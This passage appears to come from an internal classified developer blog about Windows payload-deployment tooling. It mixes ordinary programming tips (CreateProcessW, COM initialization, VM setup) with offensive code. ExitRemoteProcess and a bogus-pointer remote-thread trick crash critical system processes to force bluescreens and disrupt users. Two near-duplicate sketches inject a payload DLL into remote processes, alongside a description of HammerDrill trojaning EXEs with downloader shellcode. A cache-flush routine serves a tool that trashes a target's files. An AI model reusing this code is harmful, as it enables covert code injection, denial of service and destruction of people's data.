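    if (WaitForSingleObject(hWorkerThread, 240000) != WAIT_OBJECT_0)   // up to 4 minutes
    {
        // log it and fail the test rather than assuming the work finished
    }

    // Components that can't expose a handle just get a conservative settle time.
    Sleep(30000);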
    One other thing to note: I have observed that on local VMs with VMware Tools installed, the vmtoolsd.exe process will occasionally run away with an entire core of the CPU.  This condition coincides with copy/paste and drag-and-drop breaking between the host and guest.  If your VM is setup to run with a single virtual CPU, this can make timing issues pop up with alarming regularity.
    The moral of the story:  If your failures seem unpredictable, look at timing issues.  Just because things work fine on your multi-core dev box doesn't mean they will work in a slow VM or on an ancient target laptop.  As a professor of mine repeatedly said, "This code works 99.99% of the time.  You may never actually see it fail, but it's still wrong."
  • [User #71473]: Observations On Taking Down Critical Windows Processes
    When working on unit tests for the Payload Deployment Library SECRET library, I was running into issues killing some of my spawned child processes when they were run as SYSTEM.  Killing things nicely by sending WM_CLOSE messages to all of the process's windows and then calling TerminateProcess if the app was still up worked fine when running as an ordinary user, but as SYSTEM, nothing seemed to be working.  I suspect my process token was missing a privilege (even though I had granted myself PROCESS_TERMINATE, I read somewhere that might not be enough for SYSTEM).  At some point I will probably look at fixing the token so TerminateProcess does work, but the documentation for TerminateProcess has always seemed... unsettling.

    The TerminateProcess function is used to unconditionally cause a process to exit. The state of global data maintained by dynamic-link libraries (DLLs) may be compromised if TerminateProcess is used rather than ExitProcess.

    That sounds like it could be bad... although I'm not entirely sure what the ramifications are in real usage.  MSDN has more scary warnings on the subject under "Terminating a Process (Windows)"

    Do not terminate a process unless its threads are in known states. If a thread is waiting on a kernel object, it will not be terminated until the wait has completed. This can cause the application to stop responding.
    ...
    If a process is terminated by TerminateProcess, all threads of the process are terminated immediately with no chance to run additional code. This means that the thread does not execute code in termination handler blocks. In addition, no attached DLLs are notified that the process is detaching. If you need to have one process terminate another process, the following steps provide a better solution:
    ...blah, blah, blah, use a private windows message, blah, blah, sample code, blah, blah, blah...

    Because of the failure-to-terminate behavior and the scary MSDN commentary, I decided to look for other alternatives to TerminateProcess.  MSDN's recommendations are a non-starter; they assume that the process I am trying to kill is something I am developing and suggest a private window message.  While that works fine for a process I developed myself, it's useless for arbitrary processes that I just need to go away.  Contemplation and online research convinced me that, given MSDN's clear preference for ExitProcess as the "clean" way to terminate, forcing the target process to call ExitProcess was the way to go.  I wrote a simple ExitRemoteProcess function that takes a process handle and an arbitrary exit code and did some experimenting on various processes to see how they behaved.  I didn't deliberately set out to hose the system horribly, I just wanted to see what would happen.
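    The gist of ExitRemoteProcess looks something like the sketch below (not the exact code, but the same idea: make the target call ExitProcess itself; kernel32 loads at the same base in processes of the same bitness, so the local address of ExitProcess works as the remote start routine):

    #include <windows.h>

    BOOL ExitRemoteProcess(HANDLE hProcess, UINT uExitCode)
    {
        LPTHREAD_START_ROUTINE pfnExitProcess = (LPTHREAD_START_ROUTINE)
            GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "ExitProcess");
        if (pfnExitProcess == NULL)
            return FALSE;

        // The remote thread's parameter becomes ExitProcess's exit code in the target.
        HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, pfnExitProcess,
                                            (LPVOID)(ULONG_PTR)uExitCode, 0, NULL);
        if (hThread == NULL)
            return FALSE;

        CloseHandle(hThread);
        return TRUE;
    }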
    What I found was interesting.  Most usermode processes went down cleanly, but some refused to die quietly and hung around undisturbed.  SYSTEM processes were generally even more resilient, as only a few (winlogon and dwm) actually terminated from ExitProcess.  Killing dwm isn't so bad... at least not on its own.  Killing winlogon is super annoying since it takes all of the current user's processes with it... and possibly any other logged in users as well.  But killing a couple SYSTEM processes wasn't enough.
    A more effective but potentially messier solution was to cause a deliberate access violation in the target process – we do this by using CreateRemoteThread to pass a bogus pointer value to a function that takes a pointer value as its first argument.  Most well behaved API functions nowadays check for a NULL pointer, but they certainly don't check for 0xFEEDFACEDEADBEEF, now do they?  I targeted the problematic processes with this technique and many more of them went down.  Some processes I could not open at all with whatever standard permissions SYSTEM receives when running via psexec – csrss.exe and smss.exe were notably resistant to my attempts to open them.  Other processes were surprisingly less resilient:
    • Wininit can be crashed and doing so leads to an instant bluescreen with stop code 0x000000ef (CRITICAL_PROCESS_DIED).  Too easy...
    • Killing lsass.exe leads to a popup and automatic shutdown after a 1 minute delay.  At least you still have time to save your work, I guess...
    • Several processes that restart themselves (notably WUDFHost.exe and svchost.exe) will eventually stop respawning if killed repeatedly in a tight loop. 
    • Crashing dwm.exe in a tight loop (2000 ms sleep or smaller between attempts to crash) is non-fatal but horribly annoying to the user.  The screen flickers between the desktop and a blank screen, and although the interface remains quasi-usable (you can still click things), the repeated crashes of dwm.exe destabilize and eventually crash winlogon.exe, taking all other user processes with it.  The more mouse/keyboard activity while in the loop, the more frequent the winlogon crashes, but even an unattended machine will still occasionally crash out to the login screen.
    • Crashing numerous restarting system processes such as WUDFHost.exe and svchost.exe seems to destabilize the system and frequently results in a bluescreen with Stop code 0xc000021a (STATUS_SYSTEM_PROCESS_TERMINATED).  The description of this stop code on answers.microsoft.com is amusing:
    This error occurs when a user-mode subsystem, such as WinLogon or the Client Server Run-Time Subsystem (CSRSS) has been fatally compromised and security can no longer be guaranteed.  In response, the operating system switches to kernel mode.  Microsoft Windows cannot run without WinLogon or CSRSS.  Therefore, this is one of the few cases where the failure of a user-mode service can shut down the system.
    Interestingly, neither WinLogon nor CSRSS were touched when the 0xc000021a bluescreens were shown – but somehow we managed to "fatally compromise them" such that "security can no longer be guaranteed."  ROFL

    #killItWithFire
    #lolWindows
    #moreLikeWinDiesAmirite?
    #getOffMyLawn
  • [User #71473]: When Windows Lies...
    I've been working on fixing some code in the PayloadDeployment library related to the task scheduler component: Create Process And Choose A User To Run As Via The Task Scheduler (TaskSchedulerRun_SPKL - Speckled) SECRET  The existing code was using the GetStatus() method of the ITask interface to try to determine if the task had started, but this was returning an error related to the fact that the task was not defined to have a trigger (it's intended to be run one time only using the Run() method and then deleted).  I went in and added a legitimate daily trigger starting in 1999 to see if the code would then work, but then repeatedly got SCHED_S_TASK_HAS_NOT_RUN.  I was staring at the task that just, in fact, ran in the Task Scheduler UI and found myself scratching my head.  Surely there must be some way to determine that the task that just ran and dropped a file on my desktop actually, ya know, ran.
    I ploughed through the ITask interface and found GetExitCode() and GetMostRecentRunTime(), thinking that since both of these values were staring at me from the UI they must surely be available via the API.  Sadly, both also returned SCHED_S_TASK_HAS_NOT_RUN and filled in their Out parameters with 0 values.
    Thinking that maybe if the task was run via the schedule and not directly via Run() we might get meaningful values, I tried creating the trigger to run one minute from now.  I saw the task run on the appointed minute, but once again, nothing but SCHED_S_TASK_HAS_NOT_RUN.
    Unless someone out there has some insight into why the API fails to return any meaningful data while the UI returns copious details about the totally-not-failing-to-run task, then I am forced to assume that lying Windows is a filthy liar... and may wind up just parsing the output from schtasks.exe to see if my task ran.

    hReturn = pITask->Run();

    // So... basically windows is lying to us in every possible way below.
    BOOL bRunning = FALSE;
    INT32 iCount = 0;
    HRESULT hrStatus = 0;
    DWORD taskExitCode = 0;
    SYSTEMTIME pstLastRunTime = { 0 };

    hReturn = pITask->GetStatus(&hrStatus);
    if (hrStatus == SCHED_S_TASK_RUNNING)
    {
        DEBUGPRINT(eMT_Info, L"Task is running\r\n");
        bRunning = TRUE;
    }

    hReturn = pITask->GetExitCode(&taskExitCode);
    if (hReturn == S_OK)
    {
        DEBUGPRINT(eMT_Info, L"Task ran with exit code %d", taskExitCode);
        bRunning = TRUE;
    }

    hReturn = pITask->GetMostRecentRunTime(&pstLastRunTime);
    if (hReturn == S_OK)
    {
        DEBUGPRINT(eMT_Info, L"Task ran on %.2d/%.2d/%.4d %.2d:%.2d:%.2d",
                   pstLastRunTime.wMonth, pstLastRunTime.wDay, pstLastRunTime.wYear,
                   pstLastRunTime.wHour, pstLastRunTime.wMinute, pstLastRunTime.wSecond);
        bRunning = TRUE;
    }

    #liesAndTheLyingOperatingSystemsWhoTellThem
    #getoffmylawn
  • [User #71473]: When Creating A Process Is Destroying *Your* Process
    Ever call CreateProcessW and your current process goes *poof*?  It's one of those nasty gotchas of Win32 programming that is easy to miss if you just skim the documentation.  Check out the function signature...

    BOOL WINAPI CreateProcess(
      _In_opt_     LPCTSTR lpApplicationName,
      _Inout_opt_  LPTSTR lpCommandLine,
      _In_opt_     LPSECURITY_ATTRIBUTES lpProcessAttributes,
      _In_opt_     LPSECURITY_ATTRIBUTES lpThreadAttributes,
      _In_         BOOL bInheritHandles,
      _In_         DWORD dwCreationFlags,
      _In_opt_     LPVOID lpEnvironment,
      _In_opt_     LPCTSTR lpCurrentDirectory,
      _In_         LPSTARTUPINFO lpStartupInfo,
      _Out_        LPPROCESS_INFORMATION lpProcessInformation
    );
    

    Now, pay close attention to that 2nd argument.  Notice that unlike lpApplicationName, the lpCommandLine is not marked as constant.  That's a hint that the function might mess with the contents.  It's a bit more subtle than that though...
    "The Unicode version of this function, CreateProcessW, can modify the contents of this string. Therefore, this parameter cannot be a pointer to read-only memory (such as a const variable or a literal string). If this parameter is a constant string, the function may cause an access violation." – MSDN
    So... the weird thing is that doing what you shouldn't do (pass constant data into a non-constant parameter) is actually totally okay if you are working with ASCII data.  Call CreateProcessA all day long with a hardcoded string as the lpCommandLine and everything is groovy.  Call CreateProcessW just once like that, and it's gonna crash, 100% of the time.  That "can modify the contents of this string" should be read as "will try to modify the contents of this string every. Single. TIME, and will ruin your day if you pass us a constant string every. Single. TIME".
    I know this – I've seen it repeatedly and it has bit me and my coworkers in the keister repeatedly because no matter how many times I see this, I always forget.  If I'm lucky it will suddenly dawn on me while meditating on the code.  If I'm unlucky, it won't be until I debug through every line of code or shove a messagebox or print statement before and after every block that it will hit me again.
    Let's not have this happen to you.  Copy your constant string to a buffer if you are going to use the lpCommandLine.  Or, if you don't require arguments, you can ignore lpCommandLine altogether because:
    "The lpCommandLine parameter can be NULL. In that case, the function uses the string pointed to by lpApplicationName as the command line." – MSDN

    Remember kids:

    //Bad!
    CreateProcess(NULL, L"myapp.exe", NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);

    //Good!
    WCHAR szCommandLine[MAX_PATH] = {0};
    wcscpy(szCommandLine, L"myapp.exe");
    CreateProcess(NULL, szCommandLine, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);

    //Also Good!
    CreateProcess(L"myapp.exe", NULL, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);

    Happy Coding, whippersnappers!

    #windoze
    #getOffMyLawn
  • [User #71473]: I Just Want To Know If That Process Is Running As Admin... Is That So Wrong?
    I've been working on updating some unit tests with more Awesome(tm), and one of the issues I ran into was that one of the components under test was running a payload in different contexts depending on the target operating system and UAC status.  My payload is a simple Dummy executable written by User #1179925 that drops a text file to the desktop of the currently logged in user.  Depending on whether the payload is running as SYSTEM, an Administrator (elevated) user or a Limited (non-elevated) user, it drops either system.txt, admin.txt or user.txt.  Seems like it would be easy to check whether the test ran as expected, right?  Nope, of course not.  Nothing worth doing is ever easy in Windows.
    Here's the rub – I have a testcase that tests the component Create Process As Current User +Admin (CreateProcessAsUser_LEP - Leopard) SECRET.  As the name implies, this uses the CreateProcessAsUser API call to run User, Admin or System process from a System context – handy when running as a service and you need to interact with the desktop, or receive certain Windows messages that are not propagated to Session 0.  The intent is that by setting the execution level parameter, you can selectively run as a Limited User, Admin User or a specified Process (which can be used to impersonate just about anything).  The test case was written to first run with eUser, then eAdmin, then eProcess with a SYSTEM process, producing in sequence user.txt, admin.txt and system.txt.  This works just fine on Vista+ with UAC enabled.  Unfortunately, as coded the test fails on XP and 2003 and also on any machine that has UAC disabled – which includes all of the server VMs on DART.  The "user" test was actually running as admin in these scenarios because, well, the user was an Admin account on XP and 2003 and was a permanently elevated Admin account on 2008 - 2012R2.  I could do something hackish and inelegant like check the version number and assume admin on those OSes where I know the DART VMs have UAC disabled, but that would break real machines where limited users might actually exist and/or UAC might be enabled.  Seems like a bad way to test... but I need that green check User #76978 in Bamboo like yesterday.  What to do, what to do.
    My main issue of course was the pesky user task that sometimes dropped files named "user.txt" and sometimes dropped files named "admin.txt".  I could just check for either and consider that success... and I did that for a while, but it just seemed wrong.  I want to know I was running as the user I should be running as on the target system.  Being a good little engineer, I decided the best way to proceed was to find out which user and optionally what elevation level the payload process used when it executed.  Sounds simple enough, right?  I went hunting for ways to find out if a process was running as an Administrator and found some nice MSDN sample code:

    BOOL isAdmin()
    {
        BOOL b;
        SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;
        PSID AdministratorsGroup;

        b = AllocateAndInitializeSid(
                &NtAuthority,
                2,
                SECURITY_BUILTIN_DOMAIN_RID,
                DOMAIN_ALIAS_RID_ADMINS,
                0, 0, 0, 0, 0, 0,
                &AdministratorsGroup);
        if (b)
        {
            if (!CheckTokenMembership(NULL, AdministratorsGroup, &b))
            {
                b = FALSE;
            }
            FreeSid(AdministratorsGroup);
        }

        return(b);
    }

    Looks fairly straightforward except for that heinous AllocateAndInitializeSid call (there are actually cleaner ways to do that in XP+), but hey, it's from MSDN so it has to be old school.  Note the NULL handle in CheckTokenMembership... that means check my current security token, which tells me who I am running as.  Not quite what I want, but I should be able to easily get a token from the process I want to query, right?  We can handle that with two calls, like so:
    HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    if (hProc)
    {
        //Open Process Token
        HANDLE hProcToken = NULL;
        if (OpenProcessToken(hProc, TOKEN_ALL_ACCESS, &hProcToken))
        {
            if (isAdmin(hProcToken)) // Awesomeness ensues, right?
            {
                . . .

    We can then pass that ProcessToken into our new BOOL isAdmin(HANDLE hToken) function and use it in the CheckTokenMembership call.
    Right?
    ...NOPE!
    The CheckTokenMembership call fails with error 1309: "An attempt has been made to operate on an impersonation token by a thread that is not currently impersonating a client."  Well poop.  That doesn't sound good.  It took me hours of hunting to figure out that the ProcessToken we got wasn't awesome enough to do what we needed, because it is a Primary token, which is only good for identification.  Enter DuplicateTokenEx, which lets us turn our useless (for our current intent) Primary token into a useful Impersonation Token.  Then, once we have it, we have to impersonate, or our useful token will remain useless.  The new function looks like this:

    BOOL isAdmin(HANDLE hToken)
    {
        BOOL b = FALSE;
        HANDLE hTokenDupe = NULL;
        SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;
        PSID AdministratorsGroup;

        if (DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, NULL, SecurityImpersonation,
                             TokenImpersonation, &hTokenDupe) != 0)
        {
            // Impersonate
            if (!SetThreadToken(NULL, hTokenDupe))
            {
                return FALSE;
            }

            SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;
            b = AllocateAndInitializeSid(
                    &NtAuthority,
                    2,
                    SECURITY_BUILTIN_DOMAIN_RID,
                    DOMAIN_ALIAS_RID_ADMINS,
                    0, 0, 0, 0, 0, 0,
                    &AdministratorsGroup);
            if (b)
            {
                if (!CheckTokenMembership(hTokenDupe, AdministratorsGroup, &b))
                {
                    b = FALSE;
                }
            }

            if (hTokenDupe != NULL)
            {
                SetThreadToken(NULL, NULL);
            }
            CloseHandle(hTokenDupe);
            FreeSid(AdministratorsGroup);
        }

        return (b);
    }

    It took me the better part of two days to figure this out – I thought I might need to Duplicate the handle, but I didn't realize I needed to impersonate until I finally checked GetLastError on the CheckTokenMembership call and saw that 1309 error.  Even then, it seemed like nobody writing C++ ever cared about doing isAdmin on another process or knew how to resolve error 1309 issues.  Fortunately, Delphi folks posting in German (always a badge of true hackerdom) were all over it, and I finally, FINALLY pieced together enough of the puzzle from the occasionally garbled Google translation to figure out the missing pieces.

    #thereGoes18HoursI'llNeverGetBack
    #getOffMyLawn




  • [User #71473]: Confluence Chat is now Available
    Just in case you didn't notice the little chat icon in the lower right corner of your screen.

    #whoPutThisFacebookInMyConfluence
    #getoffmylawn
  • [User #71473]: OMG THE MENU BAR IN VISUAL STUDIO 2013 WON'T STOP YELLING AT ME
    If you're a sane human being, you probably find Microsoft's new ALL UPPERCASE MENUBAR "aesthetic" exceedingly irritating.  Thankfully, a little regedit or powershell foo can fix this eyesore.
    Open up powershell and type the following:
    Set-ItemProperty -Path HKCU:\Software\Microsoft\VisualStudio\12.0\General -Name SuppressUppercaseConversion -Type DWord -Value 1 
     If you happen to be using VS 2012, change the 12.0 to 11.0 and it should work like a charm.
    You can, of course, set this key with regedit too.  Doing so is left as an exercise for the reader.

    #THISISMESHOUTINGATYOUMICROSOFT
    #getoffmylawn

  • [User #71473]: Inception - A DLL inside a DLL inside another DLL that hooks your CD burner and injects DLL downloading shellcode into EXEs. What's not to understand?

    As some of you may know, I recently wrapped up development on HammerDrill v2.0, an optical media gap jumping tool.  Part of the functionality is the ability to detect the startup of Nero processes via asynchronous WMI queries (a blog post unto itself right there) and then inject a function hooking DLL that enables me to modify the read buffer in the ReadFile() call.  I use this to trojan qualifying Windows EXE files with an entrypoint hijacking shellcode blob that pulls down an arbitrary DLL and loads it into the trojaned process.  The technique I developed for performing the DLL injection is called Inception (based on the ridiculous nesting of DLLs and shellcode involved), and it was my first foray into DLL injection from memory.
    Since I was a noob and was using the open source Memory Module code (which does not actually perform injection), I was not exactly keen to re-engineer that unfamiliar code for resolving imports, relocations and other assorted fixups so that I could perform all of that ridiculous pointery math using ReadProcessMemory() and WriteProcessMemory() in the remote process.  It sounded like a bad time... and when I started developing the Inject Dll From Memory Into A Remote Process (InjectLibraryFromMemory_HYPD - Hypodermic) SECRET technique I learned just how bad of a time it would be.  Pointer math is much easier when the pointers are local to your process.  Just sayin.  Given my trepidation, I decided it would be easier to write a simple shim DLL that used portions of the Memory Module code to do fixups on itself, call its own entrypoint for initialization, and finally memory load an embedded payload DLL that would just magically work(tm).
    The coding was a little easier than doing everything from the loading process, but I was left with the dependency that HammerDrill (itself a memory loaded DLL) now needed to carry a DLL inside of another DLL so that it could inject while it injected. Or something. It made the build process a little ugly – HammerDrillDLL depends on the MemoryShimLoaderDLL, which depends on the NeroHookFunctionsDLL, and a custom build step encrypted and compressed the output of each build stage into a header file that was included in the next stage.  Ugly
    I've been mulling over solutions to this recently when it hit me: the loader (HammerDrill) can inject a structure containing the payload DLL into the remote process as an argument to the shim DLL.  This would enable me to write a PayloadDeployment library that contains a precompiled Shim DLL (since it shouldn't have to change) and the caller simply supplies the argument structure containing the payload.  The .execute() method of the module would then inject the stub and the argument (i.e., payload) into the remote process and call the exported ordinal with a pointer to the injected structure.  The stub fixes itself up, interprets the structure as needed and then memory loads the payload.  Variant classes would support Fire and Forget v2 and ICE DLLs with minimal modifications.
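    In rough sketch form (structure layout and names are made up for illustration – not the actual HammerDrill or PayloadDeployment definitions), the argument-passing step would look something like this:

    #include <windows.h>
    #include <string.h>

    // Hypothetical argument blob handed to the already-injected shim DLL.
    typedef struct _SHIM_ARGS
    {
        DWORD dwPayloadSize;   // size of the embedded payload DLL image
        BYTE  payload[1];      // payload DLL bytes follow inline
    } SHIM_ARGS;

    // Copy the argument blob into the target and start a thread at the shim's exported routine.
    // (Error-path cleanup omitted for brevity.)
    BOOL InjectShimArgs(HANDLE hProcess, LPTHREAD_START_ROUTINE pfnShimOrdinal,
                        const BYTE *pPayload, DWORD dwPayloadSize)
    {
        SIZE_T cbArgs = sizeof(SHIM_ARGS) + dwPayloadSize;
        LPVOID pRemote = VirtualAllocEx(hProcess, NULL, cbArgs, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
        if (pRemote == NULL)
            return FALSE;

        SHIM_ARGS *pLocal = (SHIM_ARGS *)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, cbArgs);
        if (pLocal == NULL)
            return FALSE;
        pLocal->dwPayloadSize = dwPayloadSize;
        memcpy(pLocal->payload, pPayload, dwPayloadSize);

        BOOL bOk = WriteProcessMemory(hProcess, pRemote, pLocal, cbArgs, NULL);
        HeapFree(GetProcessHeap(), 0, pLocal);
        if (!bOk)
            return FALSE;

        // The shim fixes itself up, reads the structure and memory-loads the payload DLL.
        HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, pfnShimOrdinal, pRemote, 0, NULL);
        if (hThread == NULL)
            return FALSE;

        CloseHandle(hThread);
        return TRUE;
    }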
    Boom, diversity.  
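    For illustration, the loader side of that could look something like the sketch below.  This is hypothetical – SHIM_ARGS, DeployPayload and pRemoteShimEntry are stand-in names, and resolving the shim's remote entrypoint (the memory loader's job) is waved away entirely – but it shows the shape of the argument-structure handoff.

    #include <windows.h>
    #include <cstring>

    // Hypothetical argument layout: a small header the shim knows how to parse,
    // with the payload DLL image appended immediately after it.
    struct SHIM_ARGS
    {
        DWORD cbPayload;    // size of the payload DLL image in bytes
        DWORD dwFlags;      // e.g. Fire and Forget v2 vs. ICE variant
        BYTE  payload[1];   // payload DLL bytes start here
    };

    // Copy the header + payload into the target process and kick off the shim's
    // exported routine with a pointer to the injected structure.
    BOOL DeployPayload(HANDLE hProcess, LPTHREAD_START_ROUTINE pRemoteShimEntry,
                       const BYTE* pPayloadDll, DWORD cbPayloadDll, DWORD dwFlags)
    {
        SIZE_T cbArgs = sizeof(SHIM_ARGS) + cbPayloadDll;

        // Build the whole structure locally first -- all the pointer math stays
        // in our own address space, which was the entire point.
        SHIM_ARGS* pLocal = (SHIM_ARGS*)HeapAlloc(GetProcessHeap(), 0, cbArgs);
        if (!pLocal) return FALSE;
        pLocal->cbPayload = cbPayloadDll;
        pLocal->dwFlags   = dwFlags;
        memcpy(pLocal->payload, pPayloadDll, cbPayloadDll);

        BOOL ok = FALSE;
        LPVOID pRemoteArgs = VirtualAllocEx(hProcess, NULL, cbArgs,
                                            MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
        if (pRemoteArgs &&
            WriteProcessMemory(hProcess, pRemoteArgs, pLocal, cbArgs, NULL))
        {
            // The shim fixes itself up, reads SHIM_ARGS, and memory loads the payload.
            HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, pRemoteShimEntry,
                                                pRemoteArgs, 0, NULL);
            if (hThread)
            {
                CloseHandle(hThread);
                ok = TRUE;
            }
        }
        // Note: on failure this sketch leaks the remote allocation; real code wouldn't.
        HeapFree(GetProcessHeap(), 0, pLocal);
        return ok;
    }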

    #WINNING
    #obliqueXzibitReference
    #getoffmylawn

  • [User #71473]: Wait, didn't I just securely delete that file?
    SECRET//NOFORN

    So User #71468 is working on a tool to (among other things) trash somebody's files.  Handles are being stolen, files are being corrupted, it's all good!  It reminded me of another tool written by User #75251 back in the day with a little help from yours truly.
    We were trashing data.  It was awesome.  We were even overwriting files opened for exclusive write by using direct writes to the physical drive (XP only, folks – Vista and up broke the ability to do that).  We were targeting multimedia files, and the requirements said "thou shalt interrupt playback".  We figured trashing the files at such a low level would obviously stop the playback, right?  No bytes, no playback?  Turns out, we were wrong.  The system's filesystem read cache was happily keeping the entire file in memory, and the media player was happily playing it from the cache as if nobody had come in and barfed garbage bytes all over the clusters.  Frustration ensued.  Rage++... but what were we to do?
    The answer came from a single StackOverflow post that mentioned a side-effect of opening a volume handle in a peculiar way.  Although the author of the post cautioned the technique may not be reliable, we found in our testing that it was 100% effective on our target platform (Windows XP x64).
    Here's the code in question:
    // we have a global volume handle for use by our direct write calls
    HANDLE hVolHandle = INVALID_HANDLE_VALUE;

    BOOL FlushCache()
    {
        // close the volume handle if it is currently open so we can reopen it with MAGIC!
        if (hVolHandle != INVALID_HANDLE_VALUE)
        {
            CloseHandle(hVolHandle);
            hVolHandle = INVALID_HANDLE_VALUE;
        }

        // Notice the FILE_SHARE_READ without FILE_SHARE_WRITE... you can't open a volume handle for exclusive write...
        // this is really all we need, allegedly
        HANDLE hFile = CreateFile(m_szVolumeName, FILE_READ_DATA, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
        if (hFile != INVALID_HANDLE_VALUE)
        {
            // we should never be able to open a volume this way, but if we somehow did, we need to close that funky handle
            CloseHandle(hFile);
        }
        else
        {
            DWORD le = GetLastError();
            // if we failed for any reason other than a sharing violation or access denied, then it didn't work.
            // In this case, ERROR_ACCESS_DENIED or ERROR_SHARING_VIOLATION are the expected results -- GREAT SUCCESS!
            if (le != ERROR_SHARING_VIOLATION && le != ERROR_ACCESS_DENIED)
            {
                return FALSE;
            }
        }

        if (hVolHandle == INVALID_HANDLE_VALUE)
        {
            // reopen the handle with normal permissions
            if ((hVolHandle = CreateFileW(m_szVolumeName, GENERIC_READ | GENERIC_WRITE,
                                          FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING,
                                          FILE_FLAG_WRITE_THROUGH | FILE_FLAG_NO_BUFFERING, NULL)) == INVALID_HANDLE_VALUE)
            {
                return FALSE;
            }
        }
        return TRUE;
    }

    Once we added that function in and called it after trashing a certain number of bytes or files, we suddenly started seeing playback of media files interrupted as requested by the customer.  And it was good.
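    If anyone wants to wire that in, the usage was roughly this shape (again, a sketch – TrashFile and the flush interval are stand-ins, not the actual tool's names or tuning):

    #include <windows.h>
    #include <string>
    #include <vector>

    BOOL FlushCache();                               // from the snippet above
    void TrashFile(const std::wstring& path);        // hypothetical direct-write routine

    // Trash the targets, kicking the filesystem cache out from under the media
    // player every few files so it can't keep playing from RAM.
    bool TrashAndFlush(const std::vector<std::wstring>& targets)
    {
        const size_t kFlushInterval = 16;            // assumed value, tune to taste
        for (size_t i = 0; i < targets.size(); ++i)
        {
            TrashFile(targets[i]);
            if ((i + 1) % kFlushInterval == 0 && !FlushCache())
                return false;                        // volume reopen failed; stop here
        }
        return FlushCache() != FALSE;                // one last flush for the stragglers
    }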
    Now, with the way User #71468 is stealing handles, he may not actually need this technique.  But if he does, it will be right here waiting for him.

    #getoffmylawn
    #obliqueRichardMarxReference


    SECRET//NOFORN
  • [User #71473]: MSDN Lies! (or, How Not To Fail at COM initialization in somebody else's process)
    Like me, some of you may bear the unfortunate burden of developing Windows tools that rely on COM.  COM is a brutal and difficult User #72901 that is the sad baggage that comes along with the sweet and glorious awesomeness of WMI.  All the whippersnappers who have only done WMI from C# or Powershell don't even know the pain of COM because Microsoft shields these noobs from the crufty underbelly that C++ programmers can't get away from.
    If you've ever looked at the MSDN WMI examples, you've probably noticed the 5 pages of boilerplate code needed to run one simple WMI query.  Like me, you probably believed that MSDN knew what the hell they were doing given the copious error checking they include in their code.  Sadly, our belief is built on a lie, because MSDN does COM wrong.  Their error checking actually masks a nasty little problem that will repeatedly bite you in the posterior if you dare use WMI in different libraries in your code, or, heaven forbid, injected into another process that also happens to be using COM.
    Take a look at the following monstrosity:
    // Step 1: --------------------------------------------------
    // Initialize COM. ------------------------------------------
    hres = CoInitializeEx(0, COINIT_MULTITHREADED);
    if (FAILED(hres))
    {
        cout << "Failed to initialize COM library. Error code = 0x"
             << hex << hres << endl;
        return 1;                    // Program has failed.
    }

    // Step 2: --------------------------------------------------
    // Set general COM security levels --------------------------
    // Note: If you are using Windows 2000, you need to specify -
    // the default authentication credentials for a user by using
    // a SOLE_AUTHENTICATION_LIST structure in the pAuthList ----
    // parameter of CoInitializeSecurity ------------------------
    hres = CoInitializeSecurity(
        NULL,
        -1,                          // COM authentication
        NULL,                        // Authentication services
        NULL,                        // Reserved
        RPC_C_AUTHN_LEVEL_DEFAULT,   // Default authentication
        RPC_C_IMP_LEVEL_IMPERSONATE, // Default Impersonation
        NULL,                        // Authentication info
        EOAC_NONE,                   // Additional capabilities
        NULL                         // Reserved
        );
    if (FAILED(hres))
    {
        cout << "Failed to initialize security. Error code = 0x"
             << hex << hres << endl;
        CoUninitialize();
        return 1;                    // Program has failed.
    }

    All that code just to get COM up and running... and it's wrong.  They dutifully use the FAILED() macro, which normally means that any success conditions (even vaguely abnormal ones like S_FALSE) don't cause the function to bail out.  In fact, CoInitializeEx() returns S_FALSE if COM is already initialized, which would make one think that other non-fatal conditions would be S_XXXX as well.  Unfortunately, CoInitializeSecurity() has a similar already-initialized condition, but it returns a failure code (RPC_E_TOO_LATE) instead, even though you may be able to safely proceed anyway.  This is especially likely to happen if you have injected into a process that is already using COM and want to use it yourself.  If your code looks like the above, it will fail to do any of your awesome WMI stuff because you've dutifully assumed that FAILED() only catches actual failures... and RPC_E_TOO_LATE isn't really a failure as much as it is a polite note that somebody got here first and you have to make do with their security settings.
    Another little gotcha is that MSDN claims you don't even have to call it if you don't want to: "If a process does not call CoInitializeSecurity, COM calls it automatically the first time an interface is marshaled or unmarshaled, registering the system default security. No default security packages are registered until then."  Whether or not the automatic call handles the RPC_E_TOO_LATE error is unknown.  Handling it yourself is easy enough though... just check for hres != RPC_E_TOO_LATE, like so:
    if (FAILED(hres) && hres != RPC_E_TOO_LATE)
    {
        cout << "Failed to initialize security. Error code = 0x"
             << hex << hres << endl;
        CoUninitialize();
        return 1;   // Program has failed.
    }

    And there you have it.  Your code won't bail out early just because somebody else is playing in the filthy COM cesspool with you.
    #getoffmylawn

  • [User #71473]: Setting up DART on Linux Mint 17.1
    If you're an insufferable curmudgeon like me, then you absolutely hate what Fedora and Ubuntu have done to their GUIs in the last several years.  If you're looking for a better Linux environment for working with DART, I humbly offer up Linux Mint 17.1 running the Cinnamon Desktop.  You can find the DVD ISO at \\fs-01\share\OS DVD ISOs\Linux Mint 17.1 – download this to your local system before proceeding with the steps below.
    To setup a DART VM using Mint on VMware:
    1. Go to File->New Virtual Machine.
    2. Choose Typical then click Next
    3. Select I will install the operating system later then click Next
    4. Select Linux as the guest operating system and select Ubuntu 64-bit as the version, then click Next.
    5. Choose a name and location for the VM. Linux Mint 17.1 64-bit (DART) is a nice descriptive name.  Click Next
    6. Adjust your disk size as you see fit.  I went with 50GB just to be on the safe side.  Click Next
    7. Click the Customize Hardware... button and adjust your RAM and CPUs to suit your preferences.  I went with 4 GB of RAM and 2 CPUs with 2 cores apiece. 
